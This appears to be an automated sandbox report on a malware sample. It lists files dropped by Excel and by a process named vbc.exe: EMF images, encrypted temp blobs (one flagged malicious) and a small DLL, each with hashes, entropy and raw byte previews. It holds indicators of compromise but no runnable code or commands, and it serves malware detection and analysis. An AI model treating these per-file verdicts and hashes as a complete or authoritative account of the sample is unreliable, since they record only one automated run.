MD5:	5A11FF2DF0D2565F8A20172B69F572FE
SHA1:	57C22A19E352E559C34A1FC5E0313E84B6AAB2E0
SHA-256:	C3676D9B2E837AA20E2E2C9675A64F727EDB7283977A548EB1B5B200DED8041E
SHA-512:	375BE6EB1892BE0F9F679053BCDB98B21466C6192959C8EBF3323FA680BFFF196A191E6F143E1607F053CD3034A81F01D76D81B0947A4221E9420C7FB8D1347A
Malicious:	false
Preview:	....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................L...........0....N.1.....................N.1........ ....y;0........ ............z;0............................................X...%...7...................{ .@................C.a.l.i.b.r.............<...X............240.................{20....@.......dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB262224.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	5376
Entropy (8bit):	5.026686871225034
Encrypted:	false
SSDEEP:	96:cxqkZ0LbLSNR8L5oCNYdWN8M6QNcvBvPy:caLPSQek4kBE6
MD5:	C088309E58C4ACFF2F5185B95EAAAA58
SHA1:	E720C19346D296573CD15C07E260FD6F9DEC6A75
SHA-256:	F5308A8825176D8D2BA6A19F147D3DEFBF19B7EEA8C753D3C363DFEB2A6D7625
SHA-512:	A5AD478F326EA5779AA64CE38F159CC6F74ABAABF1B59CA57CDDA1A53D1376A2F9115585153C9D014D3355290F7F25EF66E19A1908D81F83C860D0690F86735C
Malicious:	false
Preview:	....l.............../...........?(..q... EMF............................V...........................fZ..U"..........................#...5...R...p...................................S.e.g.o.e. .U.I....................................................w....O.f.f.i.c.e.1.2.\.E.X.C.E.L.....h./.gYPt........D..i...........w.Vrw......v../.../......./...jw..............&w.6....v../..[&w./nwBVrw...i........../.........l...P./....v....\|./../nw..rw...il./.........../..YPt........../.........../..g.w........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D80E13D5.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	5364
Entropy (8bit):	5.098453976752756
Encrypted:	false
SSDEEP:	48:TFN/+0qkbwa4ukzw+Lv6J74aELf2ZyF7WAxdu9vsnvRo9zxDLcbKO+DM77iEKY7E:TXxqkT0L674zLWiPxdF1v+D67Dh/7m
MD5:	924FE3C770633DAAC8AB79E60CB251D5
SHA1:	A228F5C0B6BE4770CEE6FF522A21B1E5F5E5E242
SHA-256:	D65D822347BE3E1937D89689BBFFE3FFA9CC9B5290B837763A3FDB3A2A92DC0F
SHA-512:	42C35B3E47388DD04F0C31AC8837257DE134C2E2A7201148A002E847A538CFE283D05A850129F9D41187A8A0D817513367F721CDEC9F879EBB915477E530C376
Malicious:	false
Preview:	....l...*.......\|.../............:..q... EMF............................V...........................fZ..U"..............................5...R...p...................................S.e.g.o.e. .U.I....................................................w....O.f.f.i.c.e.1.2.\.E.X.C.E.L.....h./.gYPt........D..i...........w.Vrw......v../.../......./...jw..............&w.6....v../..[&w./nwBVrw...i........../.........l...P./....v....\|./../nw..rw...il./.........../..YPt........../.........../..g.w........dv......%...................................r............................... ... ..................?...........?................l...4........... ... ...(... ... ..... ..................................................................................................................................................................................................{i.w`K.iR;.eM6.aI1._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/._G/............................................

C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	545280
Entropy (8bit):	7.999676672972768
Encrypted:	true
SSDEEP:	12288:ua+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/YY:u1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2v
MD5:	60A6F9CCF51F1CF87DF77D7ED38D3A2D
SHA1:	D2D2DB15BE59C9965C6FBAAF3B641E16CA1C5734
SHA-256:	67AB7D3DACF71D9FDE987CB11C135ECF3098D9E568DA6C14D63D50D96A5C9603
SHA-512:	366B07C3E35FAAE1D4739E9C250A5B59C4D443B06E5691C1A6E6E093EA3897C4EC4F64ACB70E9396B22834332DA5CDE4CE45DD598B31DFE83104CB214439FBE1
Malicious:	true
Preview:	u....P..@.J...X.G1....Y...`...1..q{44j...+..........s..\|9.qdGtp".D..Y..;g..y.....z..!.v..Mch...K.v..l...S.....[..fv.^).-....=.x.R.....l...3.1..y...@..H..`... =c..rSMW.......w..>.Y........^{..!.u-..c..}..8.e....C..!.gs'..w.y......(..A......m......5..D.)........i$M3..8z<\..~.."G.1/}C...wP..!k....ir=.).q..lj.a..\......F$F.,&....A".v..F...D9.P.5.#.l5D.j.L.N....y.oKi......U.\|...(k....r".@.e.r.G.7f..I9.@......V../M...{1..X;..3....o........+..s@...u.A...."\]Fp...O....d.R.7B.R..mU...'...n4#.KQ.....@.....$.v..Ct)...v.1.....BH..Z.=..(.HbI...HJ.<yb#y...<.79M.<.Y.).&([..x..1.d\|"... 8_P...&..G.C.4....M...P.......=.rGL..W.cu.KmW......2...# j<.\|.w.Oa.JNkt....h...~7.h[.+.0.I...M^.......9.p..+..t.9\|Qkg........;m+P..g..L....>R.\|^.i..'....5ebl...Z...P.:Q......{}...}>KV... '.]f:(2.=..z.f9.]....l6...$.}.L.!o.`w#;1z.L.=%..>./.p...$.{....#....kF._0..e....,.'..d..V.e.GX.,.....l.I.>..d..M...q...r:OV...........4-.....GY..G.WU.q..?..l..9J....U....t....nM....I}P.Z..(.0.ys..c..

C:\Users\user\AppData\Local\Temp\nsc26D3.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsc6BC0.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsc81D.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsc8A9.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nscBA5B.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nscF0A7.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh1E7A.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh3A82.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh3B1F.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh6AF4.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nshA094.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nshD819.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nshF115.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsm1EE8.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsmB923.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsmCEF3.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsmCF90.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn2761.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn86CF.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn937.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsnBAE9.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
